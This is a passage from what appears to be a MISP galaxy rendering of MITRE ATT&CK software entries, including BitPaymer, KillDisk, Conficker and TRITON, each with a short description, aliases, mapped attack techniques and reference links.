uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 4775. Table References
Links
https://attack.mitre.org/software/S0650
https://success.trendmicro.com/solution/000283381
https://redcanary.com/threat-detection-report/threats/qbot/
https://securelist.com/qakbot-technical-analysis/103931/
https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot

BitPaymer - S0570

[BitPaymer](https://attack.mitre.org/software/S0570) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://attack.mitre.org/software/S0570) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://attack.mitre.org/software/S0570) has several indicators suggesting overlap with the [Dridex](https://attack.mitre.org/software/S0384) malware and is often delivered via [Dridex](https://attack.mitre.org/software/S0384).(Citation: Crowdstrike Indrik November 2018)

The tag is: misp-galaxy:mitre-malware="BitPaymer - S0570"

BitPaymer - S0570 is also known as:

BitPaymer
wp_encrypt
FriedEx

View relationships graph

BitPaymer - S0570 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 4776. Table References
Links
https://attack.mitre.org/software/S0570
https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

eSurv - S0507

[eSurv](https://attack.mitre.org/software/S0507) is mobile surveillanceware designed for the lawful intercept market that was developed over the course of many years.(Citation: Lookout eSurv)

The tag is: misp-galaxy:mitre-malware="eSurv - S0507"

eSurv - S0507 is also known as:

eSurv

View relationships graph

eSurv - S0507 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Geofencing - T1581" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

Table 4777. Table References
Links
https://attack.mitre.org/software/S0507
https://blog.lookout.com/esurv-research

SslMM - S0058

[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="SslMM - S0058"

SslMM - S0058 is also known as:

SslMM

View relationships graph

SslMM - S0058 has relationships with:

similar: misp-galaxy:malpedia="SslMM" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 4778. Table References
Links
https://attack.mitre.org/software/S0058
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

Ngrok - S0508

[Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)

The tag is: misp-galaxy:mitre-malware="Ngrok - S0508"

Ngrok - S0508 is also known as:

Ngrok

View relationships graph

Ngrok - S0508 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

Table 4779. Table References
Links
https://attack.mitre.org/software/S0508
https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/
https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44

FakeSpy - S0509

[FakeSpy](https://attack.mitre.org/software/S0509) is Android spyware that has been operated by the Chinese threat actor behind the Roaming Mantis campaigns.(Citation: Cybereason FakeSpy)

The tag is: misp-galaxy:mitre-malware="FakeSpy - S0509"

FakeSpy - S0509 is also known as:

FakeSpy

View relationships graph

FakeSpy - S0509 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 4780. Table References
Links
https://attack.mitre.org/software/S0509
https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world

WinMM - S0059

[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="WinMM - S0059"

WinMM - S0059 is also known as:

WinMM

View relationships graph

WinMM - S0059 has relationships with:

similar: misp-galaxy:malpedia="WinMM" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4781. Table References
Links
https://attack.mitre.org/software/S0059
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

KillDisk - S0607

[KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)

The tag is: misp-galaxy:mitre-malware="KillDisk - S0607"

KillDisk - S0607 is also known as:

KillDisk
Win32/KillDisk.NBI
Win32/KillDisk.NBH
Win32/KillDisk.NBD
Win32/KillDisk.NBC
Win32/KillDisk.NBB

View relationships graph

KillDisk - S0607 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4782. Table References
Links
https://attack.mitre.org/software/S0607
https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/
http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/
https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html
https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html

FakeM - S0076

[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="FakeM - S0076"

FakeM - S0076 is also known as:

FakeM

View relationships graph

FakeM - S0076 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 4783. Table References
Links
https://attack.mitre.org/software/S0076
http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

pngdowner - S0067

[pngdowner](https://attack.mitre.org/software/S0067) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and- execute" utility. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="pngdowner - S0067"

pngdowner - S0067 is also known as:

pngdowner

View relationships graph

pngdowner - S0067 has relationships with:

similar: misp-galaxy:malpedia="pngdowner" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 4784. Table References
Links
https://attack.mitre.org/software/S0067
http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

Conficker - S0608

[Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)

The tag is: misp-galaxy:mitre-malware="Conficker - S0608"

Conficker - S0608 is also known as:

Conficker
Kido
Downadup

View relationships graph

Conficker - S0608 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4785. Table References
Links
https://attack.mitre.org/software/S0608
https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm
https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

ZLib - S0086

[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="ZLib - S0086"

ZLib - S0086 is also known as:

ZLib

View relationships graph

ZLib - S0086 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 4786. Table References
Links
https://attack.mitre.org/software/S0086
https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

httpclient - S0068

[httpclient](https://attack.mitre.org/software/S0068) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="httpclient - S0068"

httpclient - S0068 is also known as:

httpclient

View relationships graph

httpclient - S0068 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 4787. Table References
Links
https://attack.mitre.org/software/S0068
http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

BLACKCOFFEE - S0069

[BLACKCOFFEE](https://attack.mitre.org/software/S0069) is malware that has been used by several Chinese groups since at least 2013. (Citation: FireEye APT17) (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069"

BLACKCOFFEE - S0069 is also known as:

BLACKCOFFEE

View relationships graph

BLACKCOFFEE - S0069 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4788. Table References
Links
https://attack.mitre.org/software/S0069
https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

TRITON - S0609

[TRITON](https://attack.mitre.org/software/S0609) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. [TRITON](https://attack.mitre.org/software/S0609) was deployed against at least one target in the Middle East. (Citation: FireEye TRITON 2017)(Citation: FireEye TRITON 2018)(Citation: Dragos TRISIS)(Citation: CISA HatMan)(Citation: FireEye TEMP.Veles 2018)

The tag is: misp-galaxy:mitre-malware="TRITON - S0609"

TRITON - S0609 is also known as:

TRITON
HatMan
TRISIS

View relationships graph

TRITON - S0609 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 4789. Table References
Links
https://attack.mitre.org/software/S0609
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html
https://www.dragos.com/wp-content/uploads/TRISIS-01.pdf
